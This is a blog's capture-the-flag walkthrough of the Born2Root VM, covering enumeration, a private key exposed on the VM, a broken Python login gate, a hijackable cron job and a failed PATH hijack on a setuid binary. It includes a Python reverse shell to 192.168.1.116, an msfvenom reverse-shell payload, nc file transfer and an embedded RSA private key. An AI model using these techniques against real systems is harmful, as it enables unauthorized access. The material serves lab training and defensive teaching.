Amonsec

It's all about security.

A simple blog where you can find different things about digital security.

BootToBeRoot: CTF walkthrough

Introduction

Name: Born2Root

Release date: 10 Jun 2017

Author: Hadi Mene

Series: Born2Root

 

Enumeration

First of all we get the IP address of the VM.

redacted@odin:~$ arp-scan --localnet
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
[redacted]
192.168.1.29	08:00:27:84:43:c4	CADMUS COMPUTER SYSTEMS (DUP: 2)
[redacted]

8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.373 seconds (107.88 hosts/sec). 8 responded
redacted@odin:~$

Then we can scan the target to find open ports:

redacted@odin:/$ nmap -A -sV -O -p22,80,111,47416 --reason 192.168.1.29
Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-27 15:22 EST
Nmap scan report for debian-1.home (192.168.1.29)
Host is up, received arp-response (0.00059s latency).

PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 64 OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
|   2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
|   256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_  256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (EdDSA)
80/tcp    open  http    syn-ack ttl 64 Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 2 disallowed entries 
|_/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Secretsec Company
111/tcp   open  rpcbind syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          47416/tcp  status
|_  100024  1          49516/udp  status
47416/tcp open  status  syn-ack ttl 64 1 (RPC #100024)
MAC Address: 08:00:27:84:43:C4 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.59 ms debian-1.home (192.168.1.29)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.61 seconds
redacted@odin:/$

The RPC services (rpcbind on 111 and rpc.statd on 47416) give us nothing useful, so this is going to be a web CTF. Note that robots.txt already discloses two paths, /wordpress-blog and /files.

Secret key

A quick directory enumeration with gobuster turns up two interesting folders, /files and /icons:

redacted@odin:~$ gobuster -u http://192.168.1.29 -w /usr/share/seclists/Discovery/Web_Content/common.txt -e

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.29/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 204,301,302,307,200
[+] Expanded     : true
=====================================================
http://192.168.1.29/files (Status: 301)
http://192.168.1.29/icons (Status: 301)
http://192.168.1.29/index.html (Status: 200)
http://192.168.1.29/manual (Status: 301)
http://192.168.1.29/robots.txt (Status: 200)
=====================================================
redacted@odin:~$

The first one is empty:

redacted@odin:/$ curl -s -L http://192.168.1.29/files/ | html2text -width 150 | uniq
** Index of /files **
[[ICO]] Name Last_modified Size Description
==================================================================================================================================================
[[PARENTDIR]] Parent_Directory -
==================================================================================================================================================
Apache/2.4.10 (Debian) Server at 192.168.1.29 Port 80
redacted@odin:/$

The second one is Apache's stock icon directory (the /icons/ alias that ships with the Debian package), and among the icons there is a file that does not belong there, VDSoyuAXiO.txt:

redacted@odin:/$ curl -s -L http://192.168.1.29/icons/ | html2text -width 150 | uniq
** Index of /icons **
[[ICO]] Name Last_modified Size Description
==================================================================================================================================================
[[PARENTDIR]] Parent_Directory -
[[ ]] README 2017-06-07 22:29 5.0K
[[TXT]] README.html 2017-06-07 22:29 35K
[[TXT]] VDSoyuAXiO.txt 2017-06-07 22:34 1.6K
[[IMG]] a.gif 2017-06-07 22:29 246
[[IMG]] a.png 2017-06-07 22:29 306
[[IMG]] alert.black.gif 2017-06-07 22:29 242
[[IMG]] alert.black.png 2017-06-07 22:29 293
[[IMG]] alert.red.gif 2017-06-07 22:29 247
[[IMG]] alert.red.png 2017-06-07 22:29 314
[[IMG]] apache_pb.gif 2017-06-07 22:29 4.4K
[[IMG]] apache_pb.png 2017-06-07 22:29 9.5K
[[IMG]] apache_pb.svg 2017-06-07 22:29 260K
[[IMG]] apache_pb2.gif 2017-06-07 22:29 4.1K
[[IMG]] apache_pb2.png 2017-06-07 22:29 10K
[[IMG]] back.gif 2017-06-07 22:29 216
[[IMG]] back.png 2017-06-07 22:29 308
[[IMG]] ball.gray.gif 2017-06-07 22:29 233
[[IMG]] ball.gray.png 2017-06-07 22:29 298
[[IMG]] ball.red.gif 2017-06-07 22:29 205

This is not a plain text file but an RSA private key in PEM form, which we will use to log in to the server over SSH. A PEM key carries no username or comment, so it does not say which account it belongs to; ssh-keygen -y -f prints the matching public key, which is handy for recognising it in an authorized_keys file later.

redacted@odin:/$ curl -s -L http://192.168.1.29/icons/VDSoyuAXiO.txt
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAoNgGGOyEpn/txphuS2pDA1i2nvRxn6s8DO58QcSsY+/Nm6wC
tprVUPb+fmkKvOf5ntACY7c/5fM4y83+UWPG0l90WrjdaTCPaGAHjEpZYKt0lEc0
FiQkXTvJS4faYHNah/mEvhldgTc59jeX4di0f660mJjF31SA9UgMLQReKd5GKtUx
5m+sQq6L+VyA2/6GD/T3qx35AT4argdk1NZ9ONmj1ZcIp0evVJvUul34zuJZ5mDv
DZuLRR6QpcMLJRGEFZ4qwkMZn7NavEmfX1Yka6mu9iwxkY6iT45YA1C4p7NEi5yI
/P6kDxMfCVELAUaU8fcPolkZ6xLdS6yyThZHHwIDAQABAoIBAAZ+clCTTA/E3n7E
LL/SvH3oGQd16xh9O2FyR4YIQMWQKwb7/OgOfEpWjpPf/dT+sK9eypnoDiZkmYhw
+rGii6Z2wCXhjN7wXPnj1qotXkpu4bgS3+F8+BLjlQ79ny2Busf+pQNf1syexDJS
sEkoDLGTBiubD3Ii4UoF7KfsozihdmQY5qud2c4iE0ioayo2m9XIDreJEB20Q5Ta
lV0G03unv/v7OK3g8dAQHrBR9MXuYiorcwxLAe+Gm1h4XanMKDYM5/jW4JO2ITAn
kPducC9chbM4NqB3ryNCD4YEgx8zWGDt0wjgyfnsF4fiYEI6tqAwWoB0tdqJFXAy
FlQJfYECgYEAz1bFCpGBCApF1k/oaQAyy5tir5NQpttCc0L2U1kiJWNmJSHk/tTX
4+ly0CBUzDkkedY1tVYK7TuH7/tOjh8M1BLa+g+Csb/OWLuMKmpoqyaejmoKkLnB
WVGkcdIulfsW7DWVMS/zA8ixJpt7bvY7Y142gkurxqjLMz5s/xT9geECgYEAxpfC
fGvogWRYUY07OLE/b7oMVOdBQsmlnaKVybuKf3RjeCYhbiRSzKz05NM/1Cqf359l
Wdznq4fkIvr6khliuj8GuCwv6wKn9+nViS18s1bG6Z5UJYSRJRpviCS+9BGShG1s
KOf1fAWNwRcn1UKtdQVvaLBX9kIwcmTBrl+e6P8CgYAtz24Zt6xaqmpjv6QKDxEq
C1rykAnx0+AKt3DVWYxB1oRrD+IYq85HfPzxHzOdK8LzaHDVb/1aDR0r2MqyfAnJ
kaDwPx0RSN++mzGM7ZXSuuWtcaCD+YbOxUsgGuBQIvodlnkwNPfsjhsV/KR5D85v
VhGVGEML0Z+T4ucSNQEOAQKBgQCHedfvUR3Xx0CIwbP4xNHlwiHPecMHcNBObS+J
4ypkMF37BOghXx4tCoA16fbNIhbWUsKtPwm79oQnaNeu+ypiq8RFt78orzMu6JIH
dsRvA2/Gx3/X6Eur6BDV61to3OP6+zqh3TuWU6OUadt+nHIANqj93e7jy9uI7jtC
XXDmuQKBgHZAE6GTq47k4sbFbWqldS79yhjjLloj0VUhValZyAP6XV8JTiAg9CYR
2o1pyGm7j7wfhIZNBP/wwJSC2/NLV6rQeH7Zj8nFv69RcRX56LrQZjFAWWsa/C43
rlJ7dOFH7OFQbGp51ub88M1VOiXR6/fU8OMOkXfi1KkETj/xp6t+
-----END RSA PRIVATE KEY-----
redacted@odin:/$

The home page (title "Secretsec Company") lists three staff members, which gives us candidate usernames (first name in lowercase: martin, hadi, jimmy):

  • Martin N;

  • Hadi M and

  • Jimmy S.


First shell

Before ssh will use the key, its permissions must be tightened: OpenSSH refuses a private key file that is readable by group or others.

chmod 600 privatekey

Then we have to find which account accepts this key. Since the PEM file carries no username, we try the three candidates in turn (adding -o PasswordAuthentication=no would avoid the password prompts that ssh falls back to when a key is rejected):

redacted@odin:~/Desktop$ for user in hadi jimmy martin; do
for> ssh -i privatekey $user@192.168.1.29 -o 'UserKnownHostsFile /dev/null'
for> done
The authenticity of host '192.168.1.29 (192.168.1.29)' can't be established.
ECDSA key fingerprint is SHA256:YGvYXYw8dQn8xgGpWP4AlYshhJ6D4SqY71chPOERGwE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.29' (ECDSA) to the list of known hosts.
hadi@192.168.1.29's password: 
Permission denied, please try again.
hadi@192.168.1.29's password: 
Permission denied, please try again.
hadi@192.168.1.29's password: 
hadi@192.168.1.29: Permission denied (publickey,password).
The authenticity of host '192.168.1.29 (192.168.1.29)' can't be established.
ECDSA key fingerprint is SHA256:YGvYXYw8dQn8xgGpWP4AlYshhJ6D4SqY71chPOERGwE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.29' (ECDSA) to the list of known hosts.
jimmy@192.168.1.29's password: 
Permission denied, please try again.
jimmy@192.168.1.29's password: 
Permission denied, please try again.
jimmy@192.168.1.29's password: 
jimmy@192.168.1.29: Permission denied (publickey,password).
The authenticity of host '192.168.1.29 (192.168.1.29)' can't be established.
ECDSA key fingerprint is SHA256:YGvYXYw8dQn8xgGpWP4AlYshhJ6D4SqY71chPOERGwE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.29' (ECDSA) to the list of known hosts.

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun  9 20:31:29 2017 from 192.168.0.42

READY TO ACCESS THE SECRET LAB ? 

secret password : 

Only martin accepts the key, but instead of a shell we land in a prompt asking for an extra secret password.

The check behind that prompt is broken: whatever you type is accepted. The script is started from the last line of martin's .bashrc, and its condition, password == "secretsec" or "secretlab", is parsed by Python as (password == "secretsec") or "secretlab". The right-hand operand is a non-empty string, which is always true, so the else branch (which would pkill every process of martin, the SSH session included) can never run:

martin@debian:~$ cat .bashrc |tail -1
/var/tmp/login.py
martin@debian:~$ cat /var/tmp/login.py
#!/usr/bin/python

import os

print("")
print("READY TO ACCESS THE SECRET LAB ? ")
print("")
password = raw_input("secret password : ")

if (password) == "secretsec" or "secretlab" :
    print("WELCOME ! ")
else:
    print("GET OUT ! ")
    os.system("pkill -u 'martin'")
martin@debian:~$ 
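To make the precedence bug concrete, here is the comparison as login.py wrote it next to a corrected version. This is an added example, not code from the VM; the function names are mine, and the failure branch only reports what the original would have done instead of running pkill.

```python
import hmac

# The two values the original script meant to accept.
VALID_PASSWORDS = ("secretsec", "secretlab")


def check_as_written(password):
    """The comparison exactly as /var/tmp/login.py wrote it.

    Python parses `a == b or "c"` as `(a == b) or "c"`. The right-hand operand
    is a non-empty string literal, which is always truthy, so the expression
    never evaluates to False: a wrong password yields the string "secretlab",
    and the `if` treats that as success.
    """
    return password == "secretsec" or "secretlab"


def check_fixed(password):
    """Compare against every accepted value, in constant time per candidate.

    Membership is tested explicitly with any() rather than with `or`, and
    hmac.compare_digest avoids leaking the length of the matching prefix
    through timing. Always returns a real bool.
    """
    given = password.encode()
    return any(hmac.compare_digest(given, good.encode()) for good in VALID_PASSWORDS)


def gate(password, checker=check_fixed):
    """Mirror the script's control flow and report what each branch would do.

    The original runs `pkill -u martin` on failure, which kills every process
    owned by the user, the SSH session included. Here that branch is only
    described, never executed.
    """
    if checker(password):
        return "WELCOME"
    return "GET OUT (would run: pkill -u martin)"


if __name__ == "__main__":
    for pw in ("secretsec", "secretlab", "anything-else"):
        print(f"{pw!r:18} as written: {gate(pw, check_as_written):8}  fixed: {gate(pw)}")
```

Running the block shows "anything-else" welcomed by the original check and rejected by the fixed one; the same class of bug also passes linters, since the expression is syntactically fine.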
 

From Martin to Jimmy

Looking around, we find a weak entry in /etc/crontab: every five minutes cron runs python /tmp/sekurity.py as the user jimmy. /tmp is world-writable and nothing checks who owns the script, so any local user, martin included, can create /tmp/sekurity.py and have its contents executed as jimmy.

martin@debian:~$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user    command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 *	* * *	jimmy	python /tmp/sekurity.py
martin@debian:~$ 

We can create this simple python reverse shell:

martin@debian:~$ cat /tmp/sekurity.py 
#!/usr/bin/python
import subprocess
import socket
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.1.116', 7734))

os.dup2(s.fileno(), 0) #stdin
os.dup2(s.fileno(), 1) #stdout
os.dup2(s.fileno(), 2) #stderr

process = subprocess.call(["/bin/sh","-i"])
martin@debian:~$ 
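A practitioner wants a quick way to spot this class of cron entry on any box rather than reading the file by eye. The audit below is an added example, not part of the walkthrough: it parses the six-field /etc/crontab format and reports commands whose script is writable by the current user, or does not exist but lives in a directory the user can write to. The sample crontab is constructed after the one above; the exists/writable hooks and all function names are mine, and exist only so the check can be exercised against a described filesystem instead of the real one.

```python
import os
import re

# One /etc/crontab entry: five time fields (or an @reboot-style shortcut),
# the user to run as, then the command. Per-user crontabs have no user
# field and are not covered here.
ENTRY_RE = re.compile(
    r'^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+?)\s*$')


def parse_system_crontab(text):
    """Yield (user, command) for each active entry in /etc/crontab-style text."""
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith('#'):
            continue
        if '=' in stripped.split()[0]:        # SHELL=, PATH=, MAILTO= ...
            continue
        m = ENTRY_RE.match(line)
        if m:
            yield m.group('user'), m.group('cmd')


def absolute_paths(command):
    """Absolute paths named in a command line: the script an interpreter runs,
    a binary tested with test -x, a directory handed to run-parts."""
    return [tok for tok in command.split() if tok.startswith('/') and tok != '/']


def audit_crontab(text, exists=os.path.exists,
                  writable=lambda p: os.access(p, os.W_OK)):
    """Return (user, command, path, reason) for entries we could hijack.

    An entry is reported when a path in its command is writable by the
    current user, or does not exist but sits in a directory we can write
    to, so we could create it. Run this as the unprivileged user you are
    auditing for: as root, os.access reports everything as writable.
    """
    findings = []
    for user, cmd in parse_system_crontab(text):
        for path in absolute_paths(cmd):
            if exists(path):
                if writable(path):
                    findings.append((user, cmd, path, 'writable'))
            elif writable(os.path.dirname(path)):
                findings.append((user, cmd, path, 'missing, parent dir writable'))
    return findings


# Constructed sample: two Debian default entries plus the Born2Root line.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5 *   * * *   jimmy   python /tmp/sekurity.py
"""


if __name__ == '__main__':
    # On a real box read the live file; fall back to the sample otherwise.
    try:
        with open('/etc/crontab') as f:
            text = f.read()
    except OSError:
        text = SAMPLE_CRONTAB
    for user, cmd, path, reason in audit_crontab(text):
        print(f'[{reason}] runs as {user}: {cmd}  (via {path})')
```

On the VM the jimmy entry is reported as "missing, parent dir writable" because /tmp is world-writable; once the script has been planted it shows up as "writable" instead, which is also what the same audit run as jimmy would reveal about martin's tampering.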

Cron fires the entry every five minutes, so with a listener waiting on 192.168.1.116:7734 we get a shell as jimmy within at most five minutes.


From Jimmy to root

In jimmy's home directory we find a binary named networker that apparently runs a few network commands. What makes it interesting is that it runs with root privileges, so if we can make it execute a command of ours we should get root. (Check the s bit in its mode with ls -l before spending time on it; without setuid nothing here gains privileges.)

Let's look at its strings to see whether it calls any command by bare name rather than by absolute path, which would make it a candidate for PATH hijacking:

jimmy@debian:~$ strings networker
strings networker
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
puts
printf
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.1.3
GLIBC_2.0
UWVS
t$,U
[^]
 Networker 2.0  
/sbin/ifconfig
/bin/ping -c 1  localhost 
Done 
echo 'echo linux tool version 5' 
[..snip..]

Among those strings, /sbin/ifconfig and /bin/ping are absolute paths, but the last command runs echo by bare name, so echo looks like the place to try a PATH hijack: we build our own binary named echo.

redacted@odin:/var/www/html$ msfvenom -p linux/x86/shell_reverse_tcp LPORT=3477 LHOST=192.168.1.116 -f elf -o echo
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of elf file: 152 bytes
Saved as: echo

Now we transfer the binary with nc (curl and wget are restricted and unusable on the box). Compare the byte counts on both sides afterwards: nc reports 152 bytes sent and 152 received, matching the size msfvenom printed, so the ELF arrived intact.

[Targeted system]
jimmy@debian:~$ nc -lvvp 7777 > echo
nc -lvvp 7777 > echo
listening on [any] 7777 ...
connect to [192.168.1.29] from kali-1.home [192.168.1.116] 35672
 sent 0, rcvd 152
jimmy@debian:~$


[My system]
redacted@odin:/var/www/html$ nc -nvv 192.168.1.29 7777 < echo
(UNKNOWN) [192.168.1.29] 7777 (?) open
^C sent 152, rcvd 0
redacted@odin:/var/www/html$

Finally, after making the file executable, we put /home/jimmy at the front of PATH so that a bare echo would resolve there before /bin/echo:

jimmy@debian:~$ export PATH=/home/jimmy:$PATH
export PATH=/home/jimmy:$PATH
jimmy@debian:~$ echo $PATH
echo $PATH
/home/jimmy:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
jimmy@debian:~$
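Before waiting on the binary it is worth checking whether a hijack of that string can fire at all. The example below is mine, not the walkthrough's: it emulates what the C library's system() does, namely /bin/sh -c with the attacker's directory first in PATH, using impostor programs that record when they run instead of spawning a shell. An external command such as id is redirected, while echo is never looked up because the shell resolves it as a builtin. The temporary directory stands in for /home/jimmy, and all function names are assumptions.

```python
import os
import subprocess
import tempfile

# Impostor program template: appends its name to a marker file so a caller
# can tell whether the hijack fired. Comparable to the msfvenom `echo`, minus
# the reverse shell.
IMPOSTOR = '#!/bin/sh\necho "hijacked {name}" >> "{marker}"\n'


def make_hijack_dir(names=('id', 'echo')):
    """Create a directory of impostor programs and return its path.

    Plays the role of /home/jimmy in the walkthrough.
    """
    hijack_dir = tempfile.mkdtemp(prefix='hijack-')
    marker = os.path.join(hijack_dir, 'marker')
    for name in names:
        path = os.path.join(hijack_dir, name)
        with open(path, 'w') as f:
            f.write(IMPOSTOR.format(name=name, marker=marker))
        os.chmod(path, 0o755)      # a dropped payload must be executable
    return hijack_dir


def run_via_system(hijack_dir, command):
    """Run `command` the way system() does, with hijack_dir first in PATH.

    system() hands the string to /bin/sh -c. The shell resolves builtins
    (echo, cd, test, ...) before it ever searches PATH, so only external
    commands invoked by bare name can be redirected. Returns the impostor
    lines that were hit; an empty list means the hijack did not fire.
    """
    marker = os.path.join(hijack_dir, 'marker')
    open(marker, 'w').close()
    env = dict(os.environ)
    env['PATH'] = hijack_dir + os.pathsep + env.get('PATH', '/usr/bin:/bin')
    subprocess.run(['/bin/sh', '-c', command], env=env,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    with open(marker) as f:
        return f.read().splitlines()


def shell_resolves(name):
    """Ask /bin/sh how it resolves `name`: 'builtin' or 'external'."""
    out = subprocess.run(['/bin/sh', '-c', 'type ' + name],
                         capture_output=True, text=True).stdout
    return 'builtin' if 'builtin' in out else 'external'


if __name__ == '__main__':
    d = make_hijack_dir()
    print('id   ->', shell_resolves('id'), run_via_system(d, 'id'))
    print('echo ->', shell_resolves('echo'),
          run_via_system(d, "echo 'echo linux tool version 5'"))
```

The same check applied to the other two strings gives the same answer for a different reason: /sbin/ifconfig and /bin/ping are absolute, and an absolute path is executed directly without consulting PATH.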

This attempt fails, and not because of a mistake by the VM's author: networker runs that string through system(), which means /bin/sh -c 'echo ...', and echo is a builtin in both dash and bash. The shell handles the builtin itself and never searches PATH, so the fake echo in /home/jimmy is never executed. The other two commands, /sbin/ifconfig and /bin/ping, are invoked by absolute path, which a PATH change cannot redirect either. A different route to root is needed from here.
